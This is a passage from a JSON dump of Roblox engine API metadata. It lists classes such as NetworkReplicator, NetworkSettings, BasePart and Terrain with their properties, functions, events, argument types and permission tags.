{"Type":"int","Name":"port","Default":"0"},{"Type":"int","Name":"threadSleepTime","Default":"20"}],"Name":"Start","tags":["PluginSecurity"],"Class":"NetworkServer","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"blockDuration","Default":"1000"}],"Name":"Stop","tags":["LocalUserSecurity"],"Class":"NetworkServer","type":"Function"},{"Arguments":[{"Name":"peer","Type":"Instance"},{"Name":"result","Type":"FilterResult"},{"Name":"instance","Type":"Instance"},{"Name":"member","Type":"string"}],"Name":"DataBasicFiltered","tags":["LocalUserSecurity"],"Class":"NetworkServer","type":"Event"},{"Arguments":[{"Name":"peer","Type":"Instance"},{"Name":"result","Type":"FilterResult"},{"Name":"instance","Type":"Instance"},{"Name":"member","Type":"string"}],"Name":"DataCustomFiltered","tags":["LocalUserSecurity"],"Class":"NetworkServer","type":"Event"},{"Arguments":[{"Name":"peer","Type":"string"},{"Name":"replicator","Type":"Instance"}],"Name":"IncommingConnection","tags":["RobloxScriptSecurity"],"Class":"NetworkServer","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"NetworkReplicator","tags":["notCreatable"]},{"ValueType":"string","type":"Property","Name":"MachineAddress","tags":["LocalUserSecurity","readonly"],"Class":"NetworkReplicator"},{"ValueType":"int","type":"Property","Name":"Port","tags":["LocalUserSecurity","readonly"],"Class":"NetworkReplicator"},{"ReturnType":"void","Arguments":[],"Name":"CloseConnection","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"DisableProcessPackets","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"EnableProcessPackets","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetPlayer","tags":[],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"verbosityLevel","Default":"0"}],"Name":"GetRakStatsString","tags":["PluginSecurity"],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"RequestCharacter","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"SendMarker","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"double","Name":"seconds","Default":null}],"Name":"SetPropSyncExpiration","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Function"},{"Arguments":[{"Name":"peer","Type":"string"},{"Name":"lostConnection","Type":"bool"}],"Name":"Disconnection","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Event"},{"Superclass":"NetworkReplicator","type":"Class","Name":"ClientReplicator","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"request","Default":null}],"Name":"RequestServerStats","tags":["RobloxScriptSecurity"],"Class":"ClientReplicator","type":"Function"},{"Arguments":[{"Name":"stats","Type":"Dictionary"}],"Name":"StatsReceived","tags":["RobloxScriptSecurity"],"Class":"ClientReplicator","type":"Event"},{"Superclass":"NetworkReplicator","type":"Class","Name":"ServerReplicator","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[],"Name":"PreventTerrainChanges","tags":["RobloxPlaceSecurity"],"Class":"ServerReplicator","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SetBasicFilteringEnabled","tags":["RobloxPlaceSecurity"],"Class":"ServerReplicator","type":"Function"},{"Arguments":[{"Name":"userId","Type":"int"},{"Name":"isAuthenticated","Type":"bool"},{"Name":"protocolVersion","Type":"int"}],"Name":"TicketProcessed","tags":[],"Class":"ServerReplicator","type":"Event"},{"ReturnType":"FilterResult","Arguments":[{"Name":"deletingItem","Type":"Instance"}],"Name":"DeleteFilter","tags":["RobloxPlaceSecurity","noyield"],"Class":"ServerReplicator","type":"Callback"},{"ReturnType":"FilterResult","Arguments":[{"Name":"firingItem","Type":"Instance"},{"Name":"event","Type":"string"}],"Name":"EventFilter","tags":["RobloxPlaceSecurity","noyield"],"Class":"ServerReplicator","type":"Callback"},{"ReturnType":"FilterResult","Arguments":[{"Name":"newItem","Type":"Instance"},{"Name":"parent","Type":"Instance"}],"Name":"NewFilter","tags":["RobloxPlaceSecurity","noyield"],"Class":"ServerReplicator","type":"Callback"},{"ReturnType":"FilterResult","Arguments":[{"Name":"changingItem","Type":"Instance"},{"Name":"member","Type":"string"},{"Name":"value","Type":"Variant"}],"Name":"PropertyFilter","tags":["RobloxPlaceSecurity","noyield"],"Class":"ServerReplicator","type":"Callback"},{"Superclass":"Instance","type":"Class","Name":"NetworkSettings","tags":["notbrowsable"]},{"ValueType":"bool","type":"Property","Name":"ArePhysicsRejectionsReported","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"CanSendPacketBufferLimit","tags":[],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"ClientPhysicsSendRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"DataGCRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"DataMtuAdjust","tags":[],"Class":"NetworkSettings"},{"ValueType":"PacketPriority","type":"Property","Name":"DataSendPriority","tags":["hidden"],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"DataSendRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"EnableHeavyCompression","tags":["hidden"],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"ExperimentalPhysicsEnabled","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"ExtraMemoryUsed","tags":["PluginSecurity","hidden"],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"FreeMemoryMBytes","tags":["PluginSecurity","hidden","readonly"],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"FreeMemoryPoolMBytes","tags":["PluginSecurity","hidden","readonly"],"Class":"NetworkSettings"},{"ValueType":"double","type":"Property","Name":"IncommingReplicationLag","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"IsQueueErrorComputed","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"IsThrottledByCongestionControl","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"IsThrottledByOutgoingBandwidthLimit","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"MaxDataModelSendBuffer","tags":["deprecated"],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"NetworkOwnerRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"PhysicsMtuAdjust","tags":[],"Class":"NetworkSettings"},{"ValueType":"PhysicsReceiveMethod","type":"Property","Name":"PhysicsReceive","tags":[],"Class":"NetworkSettings"},{"ValueType":"PhysicsSendMethod","type":"Property","Name":"PhysicsSend","tags":[],"Class":"NetworkSettings"},{"ValueType":"PacketPriority","type":"Property","Name":"PhysicsSendPriority","tags":["hidden"],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"PhysicsSendRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"PreferredClientPort","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintBits","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintEvents","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintFilters","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintInstances","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintPhysicsErrors","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintProperties","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintSplitMessage","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintStreamInstanceQuota","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintTouches","tags":[],"Class":"NetworkSettings"},{"ValueType":"double","type":"Property","Name":"ReceiveRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"RenderStreamedRegions","tags":[],"Class":"NetworkSettings"},{"ValueType":"string","type":"Property","Name":"ReportStatURL","tags":["deprecated","hidden"],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"SendPacketBufferLimit","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"ShowActiveAnimationAsset","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"ShowPartMovementWayPoint","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"TotalNumMovementWayPoint","tags":[],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"TouchSendRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"TrackDataTypes","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"TrackPhysicsDetails","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"UseInstancePacketCache","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"UsePhysicsPacketCache","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"WaitingForCharacterLogRate","tags":["deprecated","hidden"],"Class":"NetworkSettings"},{"Superclass":"Instance","type":"Class","Name":"NotificationService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"CancelAllNotification","tags":["RobloxPlaceSecurity"],"Class":"NotificationService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"alertId","Default":null}],"Name":"CancelNotification","tags":["RobloxPlaceSecurity"],"Class":"NotificationService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"alertId","Default":null},{"Type":"string","Name":"alertMsg","Default":null},{"Type":"int","Name":"minutesToFire","Default":null}],"Name":"ScheduleNotification","tags":["RobloxPlaceSecurity"],"Class":"NotificationService","type":"Function"},{"ReturnType":"Array","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetScheduledNotifications","tags":["RobloxPlaceSecurity"],"Class":"NotificationService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"NumberValue","tags":[]},{"ValueType":"double","type":"Property","Name":"Value","tags":[],"Class":"NumberValue"},{"Arguments":[{"Name":"value","Type":"double"}],"Name":"Changed","tags":[],"Class":"NumberValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"double"}],"Name":"changed","tags":["deprecated"],"Class":"NumberValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ObjectValue","tags":[]},{"ValueType":"Object","type":"Property","Name":"Value","tags":[],"Class":"ObjectValue"},{"Arguments":[{"Name":"value","Type":"Instance"}],"Name":"Changed","tags":[],"Class":"ObjectValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"Instance"}],"Name":"changed","tags":["deprecated"],"Class":"ObjectValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"OneQuarterClusterPacketCacheBase","tags":[]},{"Superclass":"Instance","type":"Class","Name":"PVInstance","tags":["notbrowsable"]},{"ValueType":"CoordinateFrame","type":"Property","Name":"CoordinateFrame","tags":["deprecated","writeonly"],"Class":"PVInstance"},{"Superclass":"PVInstance","type":"Class","Name":"BasePart","tags":["notbrowsable"]},{"ValueType":"bool","type":"Property","Name":"Anchored","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"BackParamA","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"BackParamB","tags":[],"Class":"BasePart"},{"ValueType":"SurfaceType","type":"Property","Name":"BackSurface","tags":[],"Class":"BasePart"},{"ValueType":"InputType","type":"Property","Name":"BackSurfaceInput","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"BottomParamA","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"BottomParamB","tags":[],"Class":"BasePart"},{"ValueType":"SurfaceType","type":"Property","Name":"BottomSurface","tags":[],"Class":"BasePart"},{"ValueType":"InputType","type":"Property","Name":"BottomSurfaceInput","tags":[],"Class":"BasePart"},{"ValueType":"BrickColor","type":"Property","Name":"BrickColor","tags":[],"Class":"BasePart"},{"ValueType":"CoordinateFrame","type":"Property","Name":"CFrame","tags":[],"Class":"BasePart"},{"ValueType":"bool","type":"Property","Name":"CanCollide","tags":[],"Class":"BasePart"},{"ValueType":"Color3","type":"Property","Name":"Color","tags":["deprecated"],"Class":"BasePart"},{"ValueType":"PhysicalProperties","type":"Property","Name":"CustomPhysicalProperties","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"Elasticity","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"Friction","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"FrontParamA","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"FrontParamB","tags":[],"Class":"BasePart"},{"ValueType":"SurfaceType","type":"Property","Name":"FrontSurface","tags":[],"Class":"BasePart"},{"ValueType":"InputType","type":"Property","Name":"FrontSurfaceInput","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"LeftParamA","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"LeftParamB","tags":[],"Class":"BasePart"},{"ValueType":"SurfaceType","type":"Property","Name":"LeftSurface","tags":[],"Class":"BasePart"},{"ValueType":"InputType","type":"Property","Name":"LeftSurfaceInput","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"LocalTransparencyModifier","tags":["hidden"],"Class":"BasePart"},{"ValueType":"bool","type":"Property","Name":"Locked","tags":[],"Class":"BasePart"},{"ValueType":"Material","type":"Property","Name":"Material","tags":[],"Class":"BasePart"},{"ValueType":"Vector3","type":"Property","Name":"Position","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"ReceiveAge","tags":["hidden","readonly"],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"Reflectance","tags":[],"Class":"BasePart"},{"ValueType":"int","type":"Property","Name":"ResizeIncrement","tags":["readonly"],"Class":"BasePart"},{"ValueType":"Faces","type":"Property","Name":"ResizeableFaces","tags":["readonly"],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"RightParamA","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"RightParamB","tags":[],"Class":"BasePart"},{"ValueType":"SurfaceType","type":"Property","Name":"RightSurface","tags":[],"Class":"BasePart"},{"ValueType":"InputType","type":"Property","Name":"RightSurfaceInput","tags":[],"Class":"BasePart"},{"ValueType":"Vector3","type":"Property","Name":"RotVelocity","tags":[],"Class":"BasePart"},{"ValueType":"Vector3","type":"Property","Name":"Rotation","tags":[],"Class":"BasePart"},{"ValueType":"Vector3","type":"Property","Name":"Size","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"SpecificGravity","tags":["readonly"],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"TopParamA","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"TopParamB","tags":[],"Class":"BasePart"},{"ValueType":"SurfaceType","type":"Property","Name":"TopSurface","tags":[],"Class":"BasePart"},{"ValueType":"InputType","type":"Property","Name":"TopSurfaceInput","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"Transparency","tags":[],"Class":"BasePart"},{"ValueType":"Vector3","type":"Property","Name":"Velocity","tags":[],"Class":"BasePart"},{"ValueType":"BrickColor","type":"Property","Name":"brickColor","tags":["deprecated"],"Class":"BasePart"},{"ReturnType":"void","Arguments":[],"Name":"BreakJoints","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"Tuple","Arguments":[],"Name":"CanSetNetworkOwnership","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"bool","Name":"recursive","Default":"false"}],"Name":"GetConnectedParts","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"float","Arguments":[],"Name":"GetMass","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetNetworkOwner","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"GetNetworkOwnershipAuto","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"CoordinateFrame","Arguments":[],"Name":"GetRenderCFrame","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetRootPart","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetTouchingParts","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsGrounded","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"MakeJoints","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"NormalId","Name":"normalId","Default":null},{"Type":"int","Name":"deltaAmount","Default":null}],"Name":"Resize","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"playerInstance","Default":"nil"}],"Name":"SetNetworkOwner","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SetNetworkOwnershipAuto","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"breakJoints","tags":["deprecated"],"Class":"BasePart","type":"Function"},{"ReturnType":"float","Arguments":[],"Name":"getMass","tags":["deprecated"],"Class":"BasePart","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"makeJoints","tags":["deprecated"],"Class":"BasePart","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"NormalId","Name":"normalId","Default":null},{"Type":"int","Name":"deltaAmount","Default":null}],"Name":"resize","tags":["deprecated"],"Class":"BasePart","type":"Function"},{"Arguments":[{"Name":"part","Type":"Instance"}],"Name":"LocalSimulationTouched","tags":["deprecated"],"Class":"BasePart","type":"Event"},{"Arguments":[],"Name":"OutfitChanged","tags":["deprecated"],"Class":"BasePart","type":"Event"},{"Arguments":[{"Name":"otherPart","Type":"Instance"}],"Name":"StoppedTouching","tags":["deprecated"],"Class":"BasePart","type":"Event"},{"Arguments":[{"Name":"otherPart","Type":"Instance"}],"Name":"TouchEnded","tags":[],"Class":"BasePart","type":"Event"},{"Arguments":[{"Name":"otherPart","Type":"Instance"}],"Name":"Touched","tags":[],"Class":"BasePart","type":"Event"},{"Arguments":[{"Name":"otherPart","Type":"Instance"}],"Name":"touched","tags":["deprecated"],"Class":"BasePart","type":"Event"},{"Superclass":"BasePart","type":"Class","Name":"CornerWedgePart","tags":[]},{"Superclass":"BasePart","type":"Class","Name":"FormFactorPart","tags":[]},{"ValueType":"FormFactor","type":"Property","Name":"FormFactor","tags":["deprecated"],"Class":"FormFactorPart"},{"ValueType":"FormFactor","type":"Property","Name":"formFactor","tags":["deprecated","hidden"],"Class":"FormFactorPart"},{"Superclass":"FormFactorPart","type":"Class","Name":"Part","tags":[]},{"ValueType":"PartType","type":"Property","Name":"Shape","tags":[],"Class":"Part"},{"Superclass":"Part","type":"Class","Name":"FlagStand","tags":["deprecated"]},{"ValueType":"BrickColor","type":"Property","Name":"TeamColor","tags":[],"Class":"FlagStand"},{"Arguments":[{"Name":"player","Type":"Instance"}],"Name":"FlagCaptured","tags":[],"Class":"FlagStand","type":"Event"},{"Superclass":"Part","type":"Class","Name":"Platform","tags":[]},{"Superclass":"Part","type":"Class","Name":"Seat","tags":[]},{"ValueType":"bool","type":"Property","Name":"Disabled","tags":[],"Class":"Seat"},{"ValueType":"Object","type":"Property","Name":"Occupant","tags":["readonly"],"Class":"Seat"},{"Superclass":"Part","type":"Class","Name":"SkateboardPlatform","tags":["deprecated"]},{"ValueType":"Object","type":"Property","Name":"Controller","tags":["readonly"],"Class":"SkateboardPlatform"},{"ValueType":"Object","type":"Property","Name":"ControllingHumanoid","tags":["readonly"],"Class":"SkateboardPlatform"},{"ValueType":"int","type":"Property","Name":"Steer","tags":[],"Class":"SkateboardPlatform"},{"ValueType":"bool","type":"Property","Name":"StickyWheels","tags":[],"Class":"SkateboardPlatform"},{"ValueType":"int","type":"Property","Name":"Throttle","tags":[],"Class":"SkateboardPlatform"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"impulseWorld","Default":null}],"Name":"ApplySpecificImpulse","tags":[],"Class":"SkateboardPlatform","type":"Function"},{"Arguments":[{"Name":"humanoid","Type":"Instance"},{"Name":"skateboardController","Type":"Instance"}],"Name":"Equipped","tags":[],"Class":"SkateboardPlatform","type":"Event"},{"Arguments":[{"Name":"newState","Type":"MoveState"},{"Name":"oldState","Type":"MoveState"}],"Name":"MoveStateChanged","tags":[],"Class":"SkateboardPlatform","type":"Event"},{"Arguments":[{"Name":"humanoid","Type":"Instance"}],"Name":"Unequipped","tags":[],"Class":"SkateboardPlatform","type":"Event"},{"Arguments":[{"Name":"humanoid","Type":"Instance"},{"Name":"skateboardController","Type":"Instance"}],"Name":"equipped","tags":["deprecated"],"Class":"SkateboardPlatform","type":"Event"},{"Arguments":[{"Name":"humanoid","Type":"Instance"}],"Name":"unequipped","tags":["deprecated"],"Class":"SkateboardPlatform","type":"Event"},{"Superclass":"Part","type":"Class","Name":"SpawnLocation","tags":[]},{"ValueType":"bool","type":"Property","Name":"AllowTeamChangeOnTouch","tags":[],"Class":"SpawnLocation"},{"ValueType":"int","type":"Property","Name":"Duration","tags":[],"Class":"SpawnLocation"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"SpawnLocation"},{"ValueType":"bool","type":"Property","Name":"Neutral","tags":[],"Class":"SpawnLocation"},{"ValueType":"BrickColor","type":"Property","Name":"TeamColor","tags":[],"Class":"SpawnLocation"},{"Superclass":"FormFactorPart","type":"Class","Name":"WedgePart","tags":[]},{"Superclass":"BasePart","type":"Class","Name":"MeshPart","tags":[]},{"ValueType":"Material","type":"Property","Name":"Material","tags":["deprecated","readonly"],"Class":"MeshPart"},{"ValueType":"Content","type":"Property","Name":"TextureID","tags":[],"Class":"MeshPart"},{"Superclass":"BasePart","type":"Class","Name":"ParallelRampPart","tags":["deprecated","notbrowsable"]},{"Superclass":"BasePart","type":"Class","Name":"PartOperation","tags":[]},{"ValueType":"bool","type":"Property","Name":"UsePartColor","tags":[],"Class":"PartOperation"},{"Superclass":"PartOperation","type":"Class","Name":"NegateOperation","tags":[]},{"Superclass":"PartOperation","type":"Class","Name":"UnionOperation","tags":[]},{"Superclass":"BasePart","type":"Class","Name":"PrismPart","tags":["deprecated","notbrowsable"]},{"ValueType":"PrismSides","type":"Property","Name":"Sides","tags":[],"Class":"PrismPart"},{"Superclass":"BasePart","type":"Class","Name":"PyramidPart","tags":["deprecated","notbrowsable"]},{"ValueType":"PyramidSides","type":"Property","Name":"Sides","tags":[],"Class":"PyramidPart"},{"Superclass":"BasePart","type":"Class","Name":"RightAngleRampPart","tags":["deprecated","notbrowsable"]},{"Superclass":"BasePart","type":"Class","Name":"Terrain","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"IsSmooth","tags":["readonly"],"Class":"Terrain"},{"ValueType":"Region3int16","type":"Property","Name":"MaxExtents","tags":["readonly"],"Class":"Terrain"},{"ValueType":"Color3","type":"Property","Name":"WaterColor","tags":[],"Class":"Terrain"},{"ValueType":"float","type":"Property","Name":"WaterTransparency","tags":[],"Class":"Terrain"},{"ValueType":"float","type":"Property","Name":"WaterWaveSize","tags":[],"Class":"Terrain"},{"ValueType":"float","type":"Property","Name":"WaterWaveSpeed","tags":[],"Class":"Terrain"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null}],"Name":"AutowedgeCell","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Region3int16","Name":"region","Default":null}],"Name":"AutowedgeCells","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Vector3","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null}],"Name":"CellCenterToWorld","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Vector3","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null}],"Name":"CellCornerToWorld","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Clear","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ConvertToSmooth","tags":["PluginSecurity"],"Class":"Terrain","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Region3int16","Name":"region","Default":null}],"Name":"CopyRegion","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"int","Arguments":[],"Name":"CountCells","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"center","Default":null},{"Type":"float","Name":"radius","Default":null},{"Type":"Material","Name":"material","Default":null}],"Name":"FillBall","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"CoordinateFrame","Name":"cframe","Default":null},{"Type":"Vector3","Name":"size","Default":null},{"Type":"Material","Name":"material","Default":null}],"Name":"FillBlock","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"float","Name":"resolution","Default":null},{"Type":"Material","Name":"material","Default":null}],"Name":"FillRegion","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null}],"Name":"GetCell","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null}],"Name":"GetWaterCell","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"region","Default":null},{"Type":"Vector3int16","Name":"corner","Default":null},{"Type":"bool","Name":"pasteEmptyCells","Default":null}],"Name":"PasteRegion","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"float","Name":"resolution","Default":null}],"Name":"ReadVoxels","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null},{"Type":"CellMaterial","Name":"material","Default":null},{"Type":"CellBlock","Name":"block","Default":null},{"Type":"CellOrientation","Name":"orientation","Default":null}],"Name":"SetCell","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Region3int16","Name":"region","Default":null},{"Type":"CellMaterial","Name":"material","Default":null},{"Type":"CellBlock","Name":"block","Default":null},{"Type":"CellOrientation","Name":"orientation","Default":null}],"Name":"SetCells","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null},{"Type":"WaterForce","Name":"force","Default":null},{"Type":"WaterDirection","Name":"direction","Default":null}],"Name":"SetWaterCell","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Vector3","Arguments":[{"Type":"Vector3","Name":"position","Default":null}],"Name":"WorldToCell","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Vector3","Arguments":[{"Type":"Vector3","Name":"position","Default":null}],"Name":"WorldToCellPreferEmpty","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Vector3","Arguments":[{"Type":"Vector3","Name":"position","Default":null}],"Name":"WorldToCellPreferSolid","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"float","Name":"resolution","Default":null},{"Type":"Array","Name":"materials","Default":null},{"Type":"Array","Name":"occupancy","Default":null}],"Name":"WriteVoxels","tags":[],"Class":"Terrain","type":"Function"},{"Superclass":"BasePart","type":"Class","Name":"TrussPart","tags":[]},{"ValueType":"Style","type":"Property","Name":"Style","tags":[],"Class":"TrussPart"},{"Superclass":"BasePart","type":"Class","Name":"VehicleSeat","tags":[]},{"ValueType":"int","type":"Property","Name":"AreHingesDetected","tags":["readonly"],"Class":"VehicleSeat"},{"ValueType":"bool","type":"Property","Name":"Disabled","tags":[],"Class":"VehicleSeat"},{"ValueType":"bool","type":"Property","Name":"HeadsUpDisplay","tags":[],"Class":"VehicleSeat"},{"ValueType":"float","type":"Property","Name":"MaxSpeed","tags":[],"Class":"VehicleSeat"},{"ValueType":"Object","type":"Property","Name":"Occupant","tags":["readonly"],"Class":"VehicleSeat"},{"ValueType":"int","type":"Property","Name":"Steer","tags":[],"Class":"VehicleSeat"},{"ValueType":"int","type":"Property","Name":"Throttle","tags":[],"Class":"VehicleSeat"},{"ValueType":"float","type":"Property","Name":"Torque","tags":[],"Class":"VehicleSeat"},{"ValueType":"float","type":"Property","Name":"TurnSpeed","tags":[],"Class":"VehicleSeat"},{"Superclass":"PVInstance","type":"Class","Name":"Model","tags":[]},{"ValueType":"Object","type":"Property","Name":"PrimaryPart","tags":[],"Cla